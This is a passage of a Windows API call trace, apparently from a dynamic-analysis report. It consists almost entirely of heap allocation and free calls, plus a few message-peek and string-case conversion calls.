nFileSizeHigh=0x0, nFileSizeLow=0xa86e, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="f9lcZFridHfs.rtf", cAlternateFileName="F9LCZF~1.RTF")) returned 0x41ac100 [0122.826] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0122.826] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e60 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0122.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.827] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0122.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0122.827] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0122.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0122.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e00 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0122.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392228 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.832] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.835] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 